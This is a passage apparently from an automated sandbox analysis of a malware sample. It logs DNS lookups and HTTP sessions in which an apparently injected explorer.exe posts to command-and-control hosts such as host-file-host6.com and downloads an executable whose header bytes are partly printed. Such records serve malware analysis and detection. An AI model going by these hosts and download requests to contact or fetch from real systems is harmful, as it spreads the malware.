                                                                                                                                                                                                  Nov 18, 2021 10:30:21.511094093 CET8.8.8.8192.168.2.70x1d78No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.511094093 CET8.8.8.8192.168.2.70x1d78No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.510062933 CET8.8.8.8192.168.2.70xdc19No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.717825890 CET8.8.8.8192.168.2.70x6ce1No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.923667908 CET8.8.8.8192.168.2.70x2e56No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.036092043 CET8.8.8.8192.168.2.70x4cb5No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.268027067 CET8.8.8.8192.168.2.70xe5bNo error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.880645037 CET8.8.8.8192.168.2.70xf093No error (0)host-file-host0.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.486722946 CET8.8.8.8192.168.2.70xbe17No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.700525999 CET8.8.8.8192.168.2.70xd05eNo error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.895117044 CET8.8.8.8192.168.2.70x3bafNo error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.106487989 CET8.8.8.8192.168.2.70xba91No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.721813917 CET8.8.8.8192.168.2.70xac85No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.307321072 CET8.8.8.8192.168.2.70xb638No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.547688961 CET8.8.8.8192.168.2.70x2317No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.819758892 CET8.8.8.8192.168.2.70x2ef4No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.084981918 CET8.8.8.8192.168.2.70xd565No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.272644997 CET8.8.8.8192.168.2.70xaa6cNo error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.545258045 CET8.8.8.8192.168.2.70x86feNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.545258045 CET8.8.8.8192.168.2.70x86feNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.545258045 CET8.8.8.8192.168.2.70x86feNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.545258045 CET8.8.8.8192.168.2.70x86feNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.545258045 CET8.8.8.8192.168.2.70x86feNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:36.813528061 CET8.8.8.8192.168.2.70xb4d0No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:36.813528061 CET8.8.8.8192.168.2.70xb4d0No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:36.813528061 CET8.8.8.8192.168.2.70xb4d0No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:36.813528061 CET8.8.8.8192.168.2.70xb4d0No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:36.813528061 CET8.8.8.8192.168.2.70xb4d0No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.136236906 CET8.8.8.8192.168.2.70xf8fdNo error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.348126888 CET8.8.8.8192.168.2.70x78c5No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.677207947 CET8.8.8.8192.168.2.70xb2e5No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.899976015 CET8.8.8.8192.168.2.70xac18No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.193674088 CET8.8.8.8192.168.2.70x241bNo error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.425133944 CET8.8.8.8192.168.2.70x3e50No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.624965906 CET8.8.8.8192.168.2.70x6357No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.904433012 CET8.8.8.8192.168.2.70x2619No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.159704924 CET8.8.8.8192.168.2.70xc42dNo error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.445641041 CET8.8.8.8192.168.2.70x747eNo error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.657869101 CET8.8.8.8192.168.2.70x8300No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.853019953 CET8.8.8.8192.168.2.70x7679No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.061248064 CET8.8.8.8192.168.2.70x50a1No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.390899897 CET8.8.8.8192.168.2.70x1320No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.306971073 CET8.8.8.8192.168.2.70x1b9No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.306971073 CET8.8.8.8192.168.2.70x1b9No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.306971073 CET8.8.8.8192.168.2.70x1b9No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.306971073 CET8.8.8.8192.168.2.70x1b9No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.306971073 CET8.8.8.8192.168.2.70x1b9No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.597131014 CET8.8.8.8192.168.2.70xf919No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.597131014 CET8.8.8.8192.168.2.70xf919No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.597131014 CET8.8.8.8192.168.2.70xf919No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.597131014 CET8.8.8.8192.168.2.70xf919No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.597131014 CET8.8.8.8192.168.2.70xf919No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:31.108372927 CET8.8.8.8192.168.2.70xc34dNo error (0)modenm.site80.66.87.32A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:33.135303020 CET8.8.8.8192.168.2.70x46d5No error (0)iplogger.org5.9.162.45A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.105379105 CET8.8.8.8192.168.2.70x787No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.105379105 CET8.8.8.8192.168.2.70x787No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.105379105 CET8.8.8.8192.168.2.70x787No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.105379105 CET8.8.8.8192.168.2.70x787No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.105379105 CET8.8.8.8192.168.2.70x787No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.764942884 CET8.8.8.8192.168.2.70x5893No error (0)game2030.site8.209.71.17A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:39.177006006 CET8.8.8.8192.168.2.70x68f8No error (0)game2030.site8.209.71.17A (IP address)IN (0x0001)

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • cdn.discordapp.com
                                                                                                                                                                                                  • ovnfahllse.org
                                                                                                                                                                                                    • host-file-host6.com
                                                                                                                                                                                                  • ndqivnd.org
                                                                                                                                                                                                  • privacytoolzforyou-7000.top
                                                                                                                                                                                                  • lcapgjmve.org
                                                                                                                                                                                                  • kbmxn.net
                                                                                                                                                                                                  • 216.128.137.31
                                                                                                                                                                                                  • aykdwcs.com
                                                                                                                                                                                                  • pjbqy.org
                                                                                                                                                                                                  • fhwgwmij.com
                                                                                                                                                                                                  • qhaduhxh.net
                                                                                                                                                                                                  • host-file-host0.com
                                                                                                                                                                                                  • xybblvjvyv.org
                                                                                                                                                                                                  • sdbtf.net
                                                                                                                                                                                                  • jdyptjaakt.org
                                                                                                                                                                                                  • yescuf.org
                                                                                                                                                                                                  • okbhh.com
                                                                                                                                                                                                  • ukbyppnr.com
                                                                                                                                                                                                  • dwqvad.com
                                                                                                                                                                                                  • xjqdm.com
                                                                                                                                                                                                  • atanmkbpso.com
                                                                                                                                                                                                  • hkilsvrrd.com
                                                                                                                                                                                                  • tltympjjb.org
                                                                                                                                                                                                  • mtofyflq.com
                                                                                                                                                                                                  • ltdhgfb.com
                                                                                                                                                                                                  • eqdjygbwuq.org
                                                                                                                                                                                                  • krhxuby.com
                                                                                                                                                                                                  • 45.87.154.2
                                                                                                                                                                                                  • iuyisco.net
                                                                                                                                                                                                  • gxapoluwf.net
                                                                                                                                                                                                  • cqpptcaaq.net
                                                                                                                                                                                                  • kunlarxj.org
                                                                                                                                                                                                  • fcarunhrnf.com
                                                                                                                                                                                                  • egvtcfnms.org
                                                                                                                                                                                                  • urcbtq.org
                                                                                                                                                                                                  • fwulqvf.org
                                                                                                                                                                                                  • mslexfru.com
                                                                                                                                                                                                  • luhjtydl.org
                                                                                                                                                                                                  • jorckc.net
                                                                                                                                                                                                  • yeqvyp.org
                                                                                                                                                                                                  • wcqjtt.net
                                                                                                                                                                                                  • psltwkawe.net
                                                                                                                                                                                                  • mpvkqv.com
                                                                                                                                                                                                  • cxcbx.net
                                                                                                                                                                                                  • iukehj.com

                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  0192.168.2.749779162.159.135.233443C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  1192.168.2.749802162.159.130.233443C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  10192.168.2.749771188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.079060078 CET1482OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://pjbqy.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 278
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.177164078 CET1483INHTTP/1.1 200 OK
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:16 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  11192.168.2.749772188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.272568941 CET1484OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://fhwgwmij.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 234
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.380862951 CET1484INHTTP/1.1 200 OK
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:16 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  12192.168.2.749773188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.469085932 CET1485OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://qhaduhxh.net/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 274
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.568077087 CET1486INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:16 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 8e 2c b4 59 52 db 03 f8 e5 2c f3 65 0c 4f e5 af e3 1e bb 52 de 43 d2 fe 25 80 26 80 a8 93 59 2d f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 45I:82OU&,YR,eORC%&Y-~0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  13192.168.2.749774188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.653595924 CET1487OUTGET /files/9196_1637140254_4196.exe HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: host-file-host0.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.791829109 CET1488INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:16 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  Last-Modified: Wed, 17 Nov 2021 09:10:54 GMT
                                                                                                                                                                                                  ETag: "2c2600-5d0f86b581091"
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Content-Length: 2893312
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 dd 7e da 80 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 ec 02 00 00 1c 05 00 00 00 00 00 a0 49 4d 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 72 00 00 04 00 00 ba 9f 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3a 60 08 00 50 00 00 00 00 20 03 00 44 18 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 00 00 03 00 00 20 00 00 00 6a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 44 18 05 00 00 20 03 00 00 1a 05 00 00 6e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 0c 00 00 00 00 40 08 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 20 00 00 00 60 08 00 00 02 00 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 68 65 6d 69 64 61 00 c0 44 00 00 80 08 00 00 00 00 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 2e 62 6f 6f 74 00 00 00 00 9a 25 00 00 40 4d 00 00 9a 25 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL~0IM @ r,@:`P D j `.rsrcD n@@ @@B.idata `@.themidaD`.boot%@M%``


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  14192.168.2.749776188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:20.902023077 CET4507OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://xybblvjvyv.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 324
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.002305984 CET4508INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:20 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  15192.168.2.749777188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.101572990 CET4509OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://sdbtf.net/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 357
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.221666098 CET4510INHTTP/1.1 200 OK
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:21 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  16192.168.2.749778188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.319648027 CET4510OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://jdyptjaakt.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 196
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.433017969 CET4511INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:21 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 36 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b5 53 dc 4b d7 f6 27 85 21 eb a9 96 59 28 e3 b6 4d 2a e3 b3 b5 61 fa 91 be 5a ad 75 91 c8 37 42 5c 3f 0a 43 d3 bb 43 b3 f2 5c 83 a7 94 09 db 2b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 63I:82OB%,YR("XSK'!Y(M*aZu7B\?CC\+0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
